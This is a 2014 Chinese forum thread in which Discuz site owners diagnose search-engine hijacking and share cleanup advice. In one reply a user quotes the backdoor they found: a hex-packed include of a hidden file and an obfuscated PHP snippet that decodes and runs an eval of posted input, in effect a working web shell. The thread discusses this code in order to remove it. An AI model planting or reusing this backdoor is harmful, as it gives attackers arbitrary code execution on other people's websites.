牛逼的搜索引擎劫持，function_core.php文件

这个有意思。。 我也被 市宣传办打电话叫去喝茶过。。

不过 我转的优酷视频 挺多的啊。倒是没听过 文广新局这东西。。
不过倒是分析访客的时候 发现 有一个省级的 舆论监控平台天天在 采集内容进行分析。。。所以吓得我一直很小心的
你这种情况 肯定是网站的后门被一直留在你的文件内。。
所以只能先把所有人的东西 文件啊  数据库全备份一份。 然后清空 上传一份新的安装包文件上去。。安装 再恢复数据。第三方插件暂时不要装。试运行一阵

在php脚本中加入 echo 语句逐步缩小范围，最终发现问题由下面一条语句引起
INCLUDE(pack('H*','2f7661722f746d702f2e53595344554d502f2e576830416d492e434f5245'));

上面的语句引入了 /var/tmp/.SYSDUMP/.Wh0AmI.CORE 脚本。

删除该语句后问题解决。搜索 引擎劫持解决。但是估计另外在
uc_client/control/class.php
可以找到
<?php $mt="mFsKCleRfU"; $ojj="IEBleldle"; $hsa="E9TVFsnd2VuJ10p"; $fnx="Ow=="; $zk = str_replace("d","","sdtdrd_redpdldadcde"); $ef = $zk("z", "", "zbazsze64_zdzeczodze"); $dva = $zk("p","","pcprpepaptpe_fpupnpcptpipopn"); $zvm = $dva('', $ef($zk("le", "", $ojj.$mt.$hsa.$fnx))); $zvm(); ?>

上面的脚本可以注入任意的代码。

evilvoy 发表于 2014-6-6 01:53
在php脚本中加入 echo 语句逐步缩小范围，最终发现问题由下面一条语句引起
INCLUDE(pack('H*','2f7661722f ...

谢谢大神啊 我再眼研究一下，一般放视频没事 除非有人投诉了，我的估计遭小人投诉了，但是按照规定任何网站必须有视听许可证才可以放视频  包括优酷的

McVed 发表于 2014-5-24 14:32
环境要重新配置，然后原有文件一个不留，附件什么的可以留，然后原程序覆盖(一定要清干净再覆盖)。看起来麻 ...

谢谢大神啊 我再眼研究一下，一般放视频没事 除非有人投诉了，我的估计遭小人投诉了，但是按照规定任何网站必须有视听许可证才可以放视频  包括优酷的

飘渺的蜘蛛 发表于 2014-6-3 11:00
我通过分析日志，找到了漏洞原因，是因为utility文件夹未删除导致被黑客利用！在这个文件夹里面上传了木 ...

这个文件要删除吗？

dusongqiang 发表于 2014-6-6 18:45
这个文件要删除吗？

utility文件夹整个文件夹都建议删除的，整个是discuz官方的工具包，包括恢复数据库、版本转换等，你自己去看下这个文件夹的内容就知道了，不删除是很危险的

飘渺的蜘蛛 发表于 2014-6-9 10:20
utility文件夹整个文件夹都建议删除的，整个是discuz官方的工具包，包括恢复数据库、版本转换等，你自己 ...

这个我没删除啊，一直都在 我看官方也没说都让删除。。。擦 要是没影响我就删除吧